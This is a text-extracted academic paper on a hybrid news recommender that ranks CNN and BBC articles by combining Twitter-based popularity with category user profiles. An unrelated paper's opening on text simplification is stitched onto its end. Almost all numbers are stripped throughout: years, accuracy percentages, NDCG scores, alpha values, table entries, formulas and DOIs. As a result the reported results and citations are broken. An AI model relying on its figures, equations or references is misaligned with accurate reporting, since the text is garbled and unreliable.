https://peerj.com/ krulwich & burkey ( ) and pazzani, muramatsu & billsus ( ) conducted similar work by developing intelligent information agents in their information finder system that recommended information such as news, bulletin boards, databases, etc., and syskill & webert that recommended movies, respectively. these intelligent agents incorporate traditional content-based filtering approaches to make recommendations. these agents recommend items that match the contents of the user profiles. the user profile is built based on the user’s interest and preferences in the past through explicit rankings, and this profile forms the basis for these agents to find items that are interesting to the user. mooney and roy ( ) developed a next-generation content-based recommender system that utilizes information extraction and a machine-learning algorithm for text categorization. their prototype system, learning intelligent book recommending agent (libra), uses a database of book information extracted from web pages at amazon.com. they performed a subject search on the amazon website to obtain a list of book- description urls that are published on subjects of broad interests. libra then downloads each of these pages and uses a simple pattern-based information-extraction system to extract all the information pertaining to the book such as author, title, publications, related authors, etc. preprocessing is performed on the information gathered for the removal of stop-words and formatting to obtain unique tokens. the content associated with the synopses, published reviews and customer comments were clustered into a single attribute called description. the system was trained by querying on specific authors and titles to retrieve relevant books. the books retrieved were presented to the users who were asked to rate their interest in the book. these user-book ratings form the explicit input on which to build the user profile. the system then learns a profile of the user using a bayesian learning algorithm and produces a ranked list of the most recommended additional titles from the system’s catalog. next, the classifier was used to predict the user rankings for the remaining books. finally, the top-scoring books were recommended to the user. also, the system adapts to the changing interests of the user and produces new recommendations based on the information collected from the user. libra was evaluated on several data sets. experiments were conducted on the book recommendations and two different users rated the books. the performance of the system was analyzed using a -fold validation experiment for varying number of training documents. the results indicated that the top recommendations by libra were found interesting to the users when compared to randomly selected documents. the results also implied that performance was still high despite considering very few training examples. in more recent work, kang, doornenbal & schijvenaars ( ) introduced the elsevier journal finder. the proposed service is a content-based recommender system that recommends elsevier journals that have published papers related to the one an author is willing to submit. it covers all major scientific domains available in the elsevier database and about , per-reviewed journals. the system typically uses natural language processing (nlp) techniques to generate noun phrases features from papers which will then be used to do the matching. 
they are extracted using pattern of part-of-speech tag sequences and are represented using the backus-naur-form. after being extracted, the jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ noun phrases are mined and normalized by the elsevier fingerprint engine (efe) which consist of several nlp techniques used to generate relevant annotations (sentence boundaries, tokens, part-of-speech tag, phrase chunking : : : ). the well-known okapi bm algorithm is used to do the matching between the submitted query and the papers in the database, but instead of using bag-of-words as input they use the previously generated noun phrase annotations. as an output, they produce a list of ranked paper along with their respective bm score. finally, they compute an average bm score for each journal by averaging the score of all papers published in this journal. tkalcic et al. ( ) introduce a content-based recommender system for images that uses affective labeling of multimedia content. the system uses emotion detection techniques and a k-nearest neighbor machine learning algorithm to create affective labels. collaborative recommender systems collaborative recommender systems are the best-known and most widely used recommenders. examples of organizations that use collaborative recommender systems are amazon, youtube, and reddit. a profile is created for each user (item) according to the similarity of other users (item) in the system. according to the profiles, collaborative filtering recommender systems recommend items to target users according to the preferences of their similar users. there are two major types of algorithms for collaborative filtering: user-based and the item-based. user-based algorithms find out the most similar neighbor users to a target user based on the similarity of ratings. the products having the highest ratings from the neighbors are recommended to the target user (mcnee et al., ). essentially, if the target user and the neighbor both like some items in common, then the target user is likely to like other items that their neighbor has liked that the target user has not yet purchased and/or rated. for item-based algorithms, when a user is interested in an item, similar items are also recommended to the user (yu & zhang, ; sarwar et al., ). item similarity is based on items that are commonly purchased/liked together. if, in the past, people who like star wars also like lord of the rings, then a new user who has watched star wars should have lord of the rings recommended to them. traditional collaborative recommender systems incorporate similar steps in order to make recommendations to the user. first, the user-item rating information is collected. each user is provided with a collection of items for him to rate according to his interests. each user is thus represented by item-rating pairs, which contains the ratings provided by the user to several items. next, vectors are created that represent users or items and a similarity measure is chosen. there are several possible measures to calculate the similarity between two vectors. pearson correlation, cosine vector similarity, mean-squared difference and spearman correlation are some of the most commonly used metrics to measure the similarity between pairs of vectors. the next task is to identify the neighboring users who will serve as recommenders. there are two general techniques, threshold-based and top-n. 
with the threshold-based selection, vectors whose similarity exceeds a certain threshold value are considered as neighbors of the target user. in contrast, with the top-n technique, the n-closest neighbors jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ are selected for a given value of n. finally, predictions are produced by calculating the weighted average of the neighbors’ ratings, weighted by their similarity to the target user. examples of the earliest traditional collaborative recommender systems include grouplens (resnick et al., ) and bellcore’s video recommendation system (hill et al., ) that recommended news articles and videos to, respectively. although successful first approaches, these traditional collaborative recommender systems often faced challenges such as scarcity, scalability, and cold-start. sparse data can be a problem because if you have a few thousand users but several million items, there may not be any users who have purchased the same items as a target user. scalability is an issue because there may be millions of items and/or users and millions of transactions a day. running machine-learning algorithms may be intractable, leading to a need to reduce features and/ or entities in the algorithm. the cold-start problem is one of the most difficult to deal with. when the first users interact with a new recommender system, there are no previous user preferences to exploit in order to generate any recommendations at all. to overcome the above-mentioned problems, gong ( ) developed a collaborative recommender system based on user clustering and item clustering. users are clustered based on their ratings on several items and each user’s cluster is associated with a cluster center. based on the similarity between a target user and the cluster centroids, the nearest neighbors of target user can be found to make recommendations and predictions where necessary. by clustering users and items, data can be aggregated across users or items, alleviating the sparse data problem and leading to greater accuracy. by comparing users to clusters rather than all other users, this approach is more scalable than the traditional collaborative recommendation. the approach proposed by gong ( ) is explained in detail below. first, users are clustered into groups using the k-means algorithm. the data sparsity problem faced by other collaborative recommender systems is overcome by the explicit use of the item clusters as prediction mechanisms. based on the results of item clustering, predictive strategies are applied to supply missing data. next, item clustering is implemented to identify the items with similar user ratings. the items are clustered in a manner similar to the user clustering technique. next, the cluster centers and the neighbors are identified. from the information gathered, the weighted average of the neighbors’ ratings is calculated, weighted by their similarity to the target item to produce recommendations to the users. gong ( ) created a dataset containing , ratings from , users on , movies with every user providing at least ratings. the ratings were on a numeric five- point scale with and representing negative ratings, and representing positive ratings, and indicating ambivalence. several metrics such as the mean absolute error, root mean square error and correlations between ratings and predictions are used for the purpose of evaluation and to deduce conclusions. 
the results indicated that his algorithm outperformed traditional collaborative recommendation algorithms. recently, li et al. ( ) present rank-geofm, a point of interest (poi) recommender system that uses both context-aware and collaborative filtering techniques. their approach differs from the traditional ones because they obtain geographical factorization jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ in a ranking based way. moreover, by incorporating different types of context information and by using a stochastic gradient descent-based algorithm, they are able to address the data scarcity problem common to this type of recommender system. news recommender systems news recommender systems are widely used and are a promising research direction. with so many information sources, the internet provides fast access to the millions of news articles around the globe. however, users need recommendations to help them find the most interesting articles from this flood of information. news recommender systems can be broadly classified into two types based on the type of recommendations made to the user. some recommender systems take advantage of online social networking sites to provide interesting news articles to the user. such recommendations are called popularity-based news recommendations since the articles are ranked based on their popularity identified from the social networking websites. other recommender systems recommend interesting news articles to the user solely based on the user’s interests. such recommendations are called profile-based news recommendations since they rank the news articles based on the user’s interests. the following two sections explore the applications based on the popularity based recommendation and profile- based recommendation techniques. popularity based news recommender systems news recommender systems are widely used to help readers filter through an ever- growing flood of information. many researchers focus on using real-time social networking sites such as facebook, google plus, and twitter to identify the most popular current news stories. because they are instant and widely available, they provide a massive source of information on current events. however, because they are unmoderated, the quality of the information is variable. jackoway, samet & sankaranarayanan ( ) discuss a method to determine which twitter users are posting reliable information and which posts are interesting. micro-blog posts can also be used as a way of identifying the popularity of certain events. smyth et al. represent users and items based on micro-blogging reviews of movies and used this technique with various movie recommendation strategies on live-user data (esparza, o’mahony & smyth, ). phelan, mccarthy & smyth ( ) focus on using micro-blogging activity to recommend news stories. their recommender system, buzzer, is applied to rss feeds to which the users have subscribed. buzzer mines terms from rss and twitter feeds and uses them to rank articles. phelan et al. ( a) and phelan et al. ( b), they extended their work by considering the public- rank and the friends-rank strategy rather than just considering the articles from the users’ index. profile-based news recommender systems profile-based, or personalized, news recommender systems recommend articles to the user based solely on his/her interests. a user profile is built based on the preferences or interests of the user. 
in one of the earliest news recommendation systems, pazzani, jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ muramatsu & billsus ( ) created news dude, a personal news-recommending agent that uses tf-idf in combination with a nearest neighbor algorithm in order to recommend news stories to users (billsus & pazzani, ). they developed a hybrid user model that considers both long-term and short-term interests and found out that this model outperformed the models that consider either of these interests. similarly, li et al. ( ) described a content-based recommender system that recommends news articles to a user based upon the user’s short-term and long-term reading preferences. the work from abel et al. ( ) presents a good correlation between user profile features and its relative efficiency for recommendations. they evaluate and compare three different strategies for building user profile upon tweeter stream. the three types of user profile are: entity-based user profiles, hashtag-based user profiles, and topic-based user profiles. they concluded that entity-based user profiles are the most valuable profiles and that they are a better fit for recommendation purposes. they then used this type of profile in their personalized news recommender system. recently, oh et al. ( ) proposed an innovative recommender system to recommend personalized news stories using content-based analysis of tweets in twitter. in their work, they first build a user profile by extracting keywords from the content of tweets, re-tweets and hashtags. a keyword classifier based on deep neural network analysis is being used to classify interesting keywords. then, they recommend news articles to the user using topic modeling techniques as well as tf-idf. our news recommender system incorporates both the strategies explained above, popularity and conceptual user profiles, to present a novel hybrid approach to recommend news articles to the user that are both relevant to their interests and popular with a wide audience. approach in this section, we present an overview of our hybrid news recommendation system. our basic approach is to recommend interesting news articles to the user based on a combination of his past interests and stories that are currently of broad interest. the user’s interests are captured in his user profile and the community as a whole’s broad interest is captured from tweets collected from twitter’s public timeline. finally, our intuition is that users most want to see news stories related to topics in their profile that are also creating a buzz on the blogosphere. in other words, users are shown hot stories related to their favorite topics. high-level design figure shows an architectural diagram of our hybrid news recommender system. the hybrid system consists of three modules: . popularity-based news recommender . profile-based news recommender . hybrid news recommender jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ each module implements a different approach to selecting the news articles to recommend to the user. the first module selects news articles based on the popularity of the article. the popularity of the article is identified with the help of tweets from the twitter’s public. articles that are mentioned frequently in the tweets are considered “hot” or popular. this recommender module ranks the articles based on their overall popularity. 
the second module ranks the news articles based on their similarity to a user’s profile. the news articles are ranked based on their similarity between the categories in the user’s profile and the categories to which the article belongs. the third module fuses the results from the above to modules to recommend interesting news articles to the user. the articles are ranked based on a combination of their popularity ranking and the similarity to the user’s profile. in contrast to the first module that recommends “hot” articles that are of interest to the world at large and the second module that recommends articles related to the user’s profile regardless of their popularity, this module recommends “hot” articles that are relevant to topics interesting to the user. popularity-based news recommender system figure shows an architectural diagram of the popularity-based news recommender system. first, the rss articles are collected from a news source such as cnn or the bbc and stored in the file system. these websites organize their stories by category, e.g., sports, business, politics, and entertainment etc. the file system stores all the articles organized into folders based on the category to which they belong. the rss articles are pre- processed to remove unnecessary content (html tags, numbers, etc.) while preserving the textual content. figure architecture of the hybrid news recommender system. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the pre-processed articles are then indexed by solr, an open source enterprise search platform from the apache lucene project (apache solr; http://lucene.apache.org/solr/). solr uses the lucene java search library at its core for indexing and search, and it has several apis that make it flexible to use from any programming language. solr is comprised of three main components, an indexer, a lucene index and a server. the indexer is responsible for collecting all the pre-processed articles from the article collection and creating a lucene index over them. the lucene index is a file-based inverted file that supports fast lookup by document content. the solr apache server works on top of this lucene index developed by the indexer. any requests must be made to the server that outputs results based on the underlying index. all the queries are submitted to the server which outputs the documents based on the index. figure diagrams the solr architecture. in order to identify which news stories are most popular, we also collect data from the twitter micro-blogging site. the tweet collector collects the tweets from twitter’s public timeline via the twitter’s streaming api. the collected tweets are stored in the tweet collection in json format. the tweet processor is responsible for parsing the tweet figure architecture of the popularity-based news recommender. figure solr architecture. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://lucene.apache.org/solr/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/ collection by eliminating unwanted noise and preserving the tweet content. each processed tweet is queried against the server to retrieve the articles that match the tweet contents. solr returns articles, and weights, based on how well each article matches the tweet according to the cosine similarity value. the weights for each article are accumulated across all tweets to produce a popularity weight for the article. 
thus, the popularity_wt for article i is the sum of the cosine similarity of all matching current tweets: popularity wti ¼ x t t cosinesimilarity articlei; tweettð Þ where t is the number of tweets collected articlei is the news article whose popularity is being calculated tweett is the tweet being matched against the article profile-based news recommender system in this section, we describe the profile-based news recommender system which is used as a baseline later on for evaluating the effectiveness of our different approaches. this system is comprised of four components and each component is explained in detail in the following paragraphs. figure shows the architectural diagram of the profile-based news recommender system. the profile-based recommender system uses the same article collection as the popularity-based recommender system. although articles are placed in only one category by the website editor, they may actually partially belong to more than one category. figure architecture of the profile-based recommender system. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ to allow for this, each article is classified into all potential categories using a k-nearest neighbor classifier (shiwen, baoli & qin, ), the classification module of the keyconcept project (gauch, ravindran & chandramouli, ). this tool classifies the articles to categories based on the article’s similarity to training documents for each category. the k-nearest neighbors classification approach identifies the k most similar training documents to the article then uses those similarity scores as votes for the category to which the training documents belong. the similarity of the article to each category is thus the sum of the scores of the article’s similarity to the training documents in that category that fall in the top k most similar documents overall. these categories are then sorted based on their accumulated scores. we store the top most similar categories (and their similarity scores) for use in profile matching. in order to do fast lookup by category, we again use solr to build a second lucene index that maps from category ids to document ids and weights. next, each user creates his or her own profile by manually scoring the categories presented on a web form. this user profile is used to identify documents that best match their profile. the profiles and the articles can be viewed as feature vectors where each category is a feature. the similarity of each article to the user’s profile is calculated using the inner product between the user profile’s category vector and the article’s category vector. thus, for a given user j, the personal_wt for article i is: personal wtij ¼ cosinesimilarity articleprofilei; userprofilej � � where articleprofilei is a vector of the weights for each category in the ontology for articlei userprofilej is a vector of the weights for each category in the ontology for userj to implement this, we reuse solr, querying with the lucene index that stored the article category vectors with the user’s profile. hybrid news recommender system the hybrid recommender module combines the weights provided by each of the previous two modules to produce a recommendation based on both the articles popularity to users everywhere and the article’s likely interest to the particular user. we first experimented with multiplying the two factors together. this module calculates a hybrid weight by combining the two scores. 
the hybrid weight for article i and user j is given by: hybrid wt ij ¼ popularity wtj � personal wtij next, we incorporate a tunable parameter, a, that controls how much each of the two components contributes. hybrid wt ij ¼ � � popularity wtj þ � �ð Þ � personal wtij when a is . , only the personalized_wt contributes to the overall weight. as a increases from . – . , the popularity_wt’s contribution increases and the personalized_wt’s jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ contribution decreases. eventually, when a is . , only the popularity_wt influences the ranking. sample scenario we now include a sample scenario to illustrate how the various recommender systems work. consider the following example consisting of six news articles collected from online news sites and seven recent tweets collected from twitter. assume that articles b , b , and b were related to business, article e is about entertainment, and that articles s and s were about sports. furthermore, assume that these three categories are the only categories in the ontology and that the system’s goal is to recommend three articles to the user. popularity-based recommender we will begin describing the popularity based recommendation system that recommends news articles based only on the number of tweets related to the articles. the news articles are indexed with the solr lucene indexer and the tweets queried against that collection to identify the most relevant two articles for each tweet and the associated cosine similarity scores. the cosine similarity scores for each article are then accumulated to produce the popularity_wt for each article. table shows the top two cosine similarity scores for each tweet with respect to each article. the popularity based recommender would then accumulate the cosine similarity scores for each article and the resulting aggregated value is known as the popularity_wt for that article. the articles would be sorted by in decreasing order by popularity_wt as shown in table . table data set for the sample scenario. article b article b article b article e article s article s tweet . . tweet . . tweet . . tweet . . tweet . . tweet . . tweet . . table popularity-based ranking of the articles. article popularity_wt b . e . s . b . b . s . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the popularity-based news recommender system would thus produce the following recommendations, in order: article b , article e , and article s . note the three recommendations are about three different topics, i.e., business, entertainment, and sports respectively. profile-based recommender we will now discuss the profile-based news recommender system in more detail. the user first needs to manually create his/her profile based on his/her interests in various categories. for this simple example, assume that the user creates the profile shown in table . the news articles in the collection are classified with using a knn classifier. for each article, the classifier returns a weight for each category that represents the similarity between that category and the article. table summarizes the results of this classification, showing the weights for each article for the top two matching categories. the personal_wt for each article is then produced by calculating the dot product of the category vectors for each article with the category vector for the user profile. 
for example, the weight for article b would be ( � . ) in business + ( � ) for entertainment + ( � . ) in sports for a total weight of . . the articles are then sorted in decreasing order by personal_wt. table shows the results of these calculations for this example. table user profile. category weight business entertainment sports table articles and their category-match weights. articles business wt entertainment wt sports wt b . . . b . . . b . . . e . . . s . . . s . . . table profile-based ranking of the articles. article personal_wt b . s . b . s . b . e . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the profile-based news recommender system would thus produce the following recommendations, in order: article b , article s , and article b . note that two of the three recommended articles are business-related and the middle recommendation is about sports. this reflects the user’s interests as captured by their profile. furthermore, the top recommendation is for article b versus b previously. b is a better match to the business category whereas b was much more popular on twitter. hybrid recommender we now continue our example using the set of articles in the previous examples to describe the hybrid recommendation system. the popularity_wt and personal_wt scores for each article are normalized and the hybrid_wt is the product of these normalized weights. table illustrates this process. the articles are then sorted by decreasing order by hybrid_wt to produce the final recommendations, as shown in table . the hybrid news recommender system would thus produce the following recommendations, in order: article b , article b , and article s . article b appears at the top because it is such a strong match for the user’s most highly weighted profile category. articles b and s appear because they are moderate matches for the user’s profile and also quite popular on twitter, illustrating the effects of the hybrid recommender. evaluation this section describes the experiments that we conducted to evaluate the accuracy of the recommendations based on popularity, user profile, and the hybrid recommendations. all experiments were conducted on the same collection of news articles news articles collected from cnn and bbc and , tweets collected from twitter on the same day. table hybrid ranking of the articles. article popularity_wt normalized popularity_wt personal_wt normalized personal_wt b . . . b . . . b . . . . e . . . . s . . . . s . . . . table hybrid ranking of the articles. article hybrid_wt b . b . s . b . e . s . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ we collected news articles for each of topics (sports, crime, business, politics, tech, health and entertainment). the results reported here were produced using volunteer test subjects. to evaluate the relative importance of global popularity versus individual interest in a story, we varied a from . – . in increments of . , a total of values. the profiles-based recommender system alone constitutes our baseline approach, that is, we compared both the popularity-based recommender system and the hybrid recommender system to that baseline. evaluating matching tweets to articles in our popularity-based recommender, the popularity of the news articles is determined with the help of the tweets from the twitter’s public timeline. 
a key component of that recommender is the ability to associate tweets from twitter with news articles, thus being able to identify those articles being talked about the most on the blogosphere. the goal of this experiment is to determine whether or not we can accurately match a tweet with a related news article so that we can build our popularity-based recommender around that tweet/news article-matching component. to evaluate the accuracy of the solr-provided tweet/article matches, we have selected five tweets from each of the seven news categories as test tweets ( test tweets total). we randomly selected five tweets from the tweets database that were good matches for the categories in our news article database. each test tweet was queried against the solr apache server to retrieve the top matching news articles. for each tweet’s result set, we examined the category associated with each of the top five articles. for each of those articles, we examined the category associatedwith the article and comparedthat article with thecategory associated with the tweet to judge the accuracy of our tweet/article matching module. the results of our evaluation are shown in fig. . overall, we have % accuracy in the top articles matched against a tweet. that is, % of the time, the articles retrieved in response to a given tweet match the category to which the tweet is related. our best performance is with sports related tweets ( %) and the worst is with health ( %). evaluating the hybrid recommender each volunteer test subject was presented with a web page on which they entered weights from – indicating their personal interest each of the seven categories. the users entered the weights such they totaled to . these category/weight pairs form their user profile. we essentially have two baselines to which we compare our hybrid recommender system, a purely conceptual, personalized recommender system and a purely popularity-based recommender system. these are incorporated into our evaluation of hybrid_wt , i.e., when a is , only the personal_wt contributes to the score, so we get purely profile-based recommendations. similarly, when a is , only popularity_wt contributes to the score, so the user receives purely popularity-based recommendations. for the articles retrieved by hybrid_wt and each of the values of a for hybrid_wt , evaluated, we calculated the weight of each article in our collection and sorted the articles by weight. we stored the articleid, the hybrid_wt, and rank for the top articles. thus, each subject had sets of documents to judge. different values of a bring new jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ articles to the top but they also rearrange the ordering of articles that appear in other result sets. although subjects could potentially be asked to judge articles, the average number of unique articles judged by the subjects was . to avoid user fatigue and gather consistent feedback, each article was presented to be judged only once, and that judgment used to evaluate all the result sets in which the article appeared. in order to avoid bias, we randomized the order of presentation of the news articles to the user. thus, they did not know which system(s) recommended the news articles or where the articles were ranked originally. the users were asked to rate each article recommended as very interesting, interesting, or not interesting. 
once the user finishes rating all the articles, information such as profile, the article’s strategy, rank, weight and the user’s rating were logged into a file for analysis. results we evaluated our recommender systems using the normalized discounted cumulative gain at top k (ndcg@k), a widely used metric for rank ordered lists. we analyzed the results of users who completed the evaluation of the top documents for each method. with that metric, hybrid_wt produces a ndcg@ of . . our next task is to tune hybrid_wt to identify the best performing value for a so that we can compare our two hybrid approaches. the ndcg@ over all users as alpha is varied from (pure personalized) to (pure popularity) in steps of . is depicted graphically in fig. . the worst performance, . , arises when the popularity measure dominates the ratings is considered (a = . ). when only the popularity_wt is used, the ndcg is quite low, . . in contrast, when the only user’s profile is considered (a = . ), we achieve an ndcg of . . our results show that as measured by the ndcg metric, both a = . and a = . outperform all other a values tied with an ndcg of . . these results indicate that the a cc u ra cy figure accuracy of tweet/category matching. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ most relevant articles are those that are selected using a relatively equal combination mixture of their interests and general public’s interests. table contains a comparison of both hybrid approaches to the baselines of purely personal and purely popular recommendations. overall, hybrid_wt with a = . outperforms hybrid_wt by . %, personal_wt by . %, and popularity_wt by . %. we performed a paired two-tailed student’s t-test analysis and confirmed that the hybrid_wt improvement versus the personal_wt was statistically significant (p = . ). similarly, the hybrid_wt improvement versus the popularity_wt was statistically significant (p = . ) as was the improvement of hybrid_wt over hybrid_wt (p = . ). conclusion in this paper, we presented the design and implementation of a news recommender system that incorporates a novel approach to recommend interesting news articles to the user. we implemented four different strategies to recommend news articles to the user that are interesting to read. we have evaluated each of the strategies by comparing them to our baseline approach which is the personal recommender system. we found that: . both hybrid approaches outperform the popularity and personal recommendations. . the personal recommender provides better recommendations than the popularity- based recommender. . the tunable hybrid algorithm with a = . provided the best overall performance. . . . . . . . . . . . . . . n d c g @ α value figure evaluating hybrid_wt : ndcg@ versus a. table ndcg@ per approach. personal (a = ) popularity (a = ) hybrid_wt hybrid_wt (a = . ) ndcg@ . . . . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ we can extend this work in several ways. in particular, the accuracy of our news recommender system can be improved by considering other features such as location or temporal activity. also, our users provided explicit feedback about the categories in which they were interested. the recommender system could be improved by implicitly inferring the users’ interests based on their reading habits. additional information and declarations funding the authors received no funding for this work. 
competing interests susan gauch is an academic editor for peerj computer science. author contributions � nirmal jonnalagedda conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � susan gauch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper, submitted manuscript for publication. � kevin labille wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, updated literature review. � sultan alfarhood analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. data deposition the following information was supplied regarding data availability: the raw data includes human subjects information that cannot be shared. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references abel f, gao q, houben gj, tao k. . analyzing user modeling on twitter for personalized news recommendations. user modeling, adaption and personalization. berlin, heidelberg: springer, – . balabanovic m, shoham y. . fab: content-based, collaborative recommendation. communications of the acm. new york: acm, – . billsus d, pazzani mj. . a personal news agent that talks, learns and explains. in: proceedings of the third annual conference of autonomous agents, new york: acm press, – . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplementalnformation http://dx.doi.org/ . /peerj-cs. #supplementalnformation http://dx.doi.org/ . /peerj-cs. https://peerj.com/ das as, datar m, garg a, rajaram s. . google news personalization: scalable online collaborative filtering. in: proceedings of the sixteenth international conference on world wide web, new york, ny, usa, – . esparza sg, o’mahony mp, smyth b. . on the real-time web as a source of recommendation knowledge. in: proceedings of the fourth acm conference on recommender systems, recsys , barcelona, spain, – september, new york: acm, – . gauch s, ravindran d, chandramouli a. . keyconcept: conceptual search and pruning exploiting concept relationships. journal of intelligent systems ( ): – doi . /jisys. . . . . gong s. . a collaborative filtering recommendation algorithm based on user clustering and item clustering. journal of software ( ): – doi . /jsw. . . - . hill w, stead l, rosenstein m, furnas g. . recommending and evaluating choices in a virtual community of use. in: proceedings of the sigchi conference on human factors in computing systems, new york: acm press/addison-wesley publishing co., – . jackoway a, samet h, sankaranarayanan j. . identification of live news events using twitter. in: proceedings of the third acm sigspatial international workshop on location-based social networks, new york, ny, usa. new york: acm, – . kang n, doornenbal m, schijvenaars b. . elsevier journal finder: recommending journals for your paper. in: proceedings of the ninth acm conference on recommender systems, new york: acm, – . koren y. . factor in the neighbors: scalable and accurate collaborative filtering. acm transactions in knowledge discovery from data (tkdd) ( ):article doi . / . krulwich b, burkey c. . 
learning user information interests through extraction of semantically significant phrases. in: proceedings of the aaai spring symposium on machine learning in information access. palo alto: aaai press, – . lang k. . newsweeder: learning to filter netnews. in: proceedings of the twelfth international conference on machine learning. san francisco: morgan kaufmann, – . li l, zheng l, yang f, li t. . modeling and broadening temporal user interest in personalized news recommendation. expert systems with applications ( ): – doi . /j.eswa. . . . li x, cong g, li xl, pham tan, krishnaswamy s. . rank-geofm: a ranking based geographical factorization method for point of interest recommendation. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . mcnee m, albert i, cosley d, gopalkrishnan p, lam ks, rashid ma, konstan aj, riedl j. . on the recommending of citations for research papers. in: proceedings of the acm conference on computer supported cooperative work, new york, ny, usa. new york: acm, – . mooney rj, roy l. . content-based book recommending using learning for text categorization. in: proceedings of the fifth acm conference on digital libraries, new york, ny, usa. new york: acm, – . oh kj, lee wj, lim cg, choi hj. . personalized news recommendation using classified keywords to capture user preference. in: proceedings of the sixteenth international conference on advanced communication technology, – feb. piscataway: ieee, – . pazzani m, muramatsu j, billsus d. . syskill & webert: identifying interesting web sites. in: proceedings of the thirteenth national conference on artificial intelligence. palo alto: aaai press, – . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jisys. . . . http://dx.doi.org/ . /jsw. . . - http://dx.doi.org/ . / http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/ phelan o, mccarthy k, bennett m, smyth b. a. on using the real-time web for news recommendation & discovery. in: proceedings of the twentieth international conference companion on world wide web, hyderabad, india, march– april. phelan o, mccarthy k, bennett m, smyth b. b. terms of a feather: content-based news recommendation and discovery using twitter. in: proceedings of the thirty-third european conference on advances in information retrieval. berlin, heidelberg: springer. phelan o, mccarthy k, smyth b. . using twitter to recommend real-time topical news. in: proceedings of the third acm conference on recommender systems, new york, ny, usa, – october. new york: acm, – . resnick p, iacovou n, suchak m, bergstrom p, riedl j. . grouplens: an open architecture for collaborative filtering of netnews. in: proceedings of the acm conference on computer-supported cooperative work, chapel hill, nc. new york: acm, – . sarwar b, karypis g, konstan j, riedl j. . item-based collaborative filtering recommendation algorithms. in: proceedings of the tenth international conference on world wide web, – . shiwen y, baoli l, qin l. . an adaptive k-nearest neighbor text categorization strategy. journal of acm transactions on asian language information processing (talip) ( ): – doi . / . . su x, khoshgoftaar tm. . a survey of collaborative filtering techniques. advances in artificial intelligence : doi . / / . tkalcic m, odic a, kosir a, tasic j. . affective labeling in a content-based recommender system for images. ieee transactions on multimedia ( ): – doi . /tmm. . . 
tuzhilin a, adomavicius g. . toward the next generation of recommender systems: a survey of the state-of-the-art and possible extensions. ieee transactions on knowledge and data engineering. piscataway: ieee, – . yu h, zhang f. . collaborative filtering recommender system in adversarial environment. in: international conference on machine learning and cybernetics (icmlc) – july. piscataway: ieee. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . / / http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/ incorporating popularity in a personalized news recommender system introduction literature review approach evaluation conclusion references optimizing statistical machine translation for text simplification wei xu , courtney napoles , ellie pavlick , quanze chen and chris callison-burch computer and information science department university of pennsylvania {xwe, epavlick, cquanze, ccb}@seas.upenn.edu department of computer science johns hopkins university courtneyn@jhu.edu abstract most recent sentence simplification systems use basic machine translation models to learn lexical and syntactic paraphrases from a man- ually simplified parallel corpus. these meth- ods are limited by the quality and quantity of manually simplified corpora, which are expen- sive to build. in this paper, we conduct an in- depth adaptation of statistical machine trans- lation to perform text simplification, taking advantage of large-scale paraphrases learned from bilingual texts and a small amount of manual simplifications with multiple refer- ences. our work is the first to design auto- matic metrics that are effective for tuning and evaluating simplification systems, which will facilitate iterative development for this task. introduction the goal of text simplification is to rewrite an input text so that the output is more readable. text sim- plification has applications for reducing input com- plexity for natural language processing (siddharthan et al., ; miwa et al., ; chen et al., b) and providing reading aids for people with lim- ited language skills (petersen and ostendorf, ; watanabe et al., ; allen, ; de belder and moens, ; siddharthan and katsos, ) or lan- guage impairments such as dyslexia (rello et al., ), autism (evans et al., ), and aphasia (car- roll et al., ). it is widely accepted that sentence simplification can be implemented by three major types of oper- ations: splitting, deletion and paraphrasing (feng, ). the splitting operation decomposes a long sentence into a sequence of shorter sentences. dele- tion removes less important parts of a sentence. the paraphrasing operation includes reordering, lexical substitutions and syntactic transformations. while sentence splitting (siddharthan, ; petersen and ostendorf, ; narayan and gardent, ; an- grosh et al., ) and deletion (knight and marcu ; clarke and lapata ; filippova and 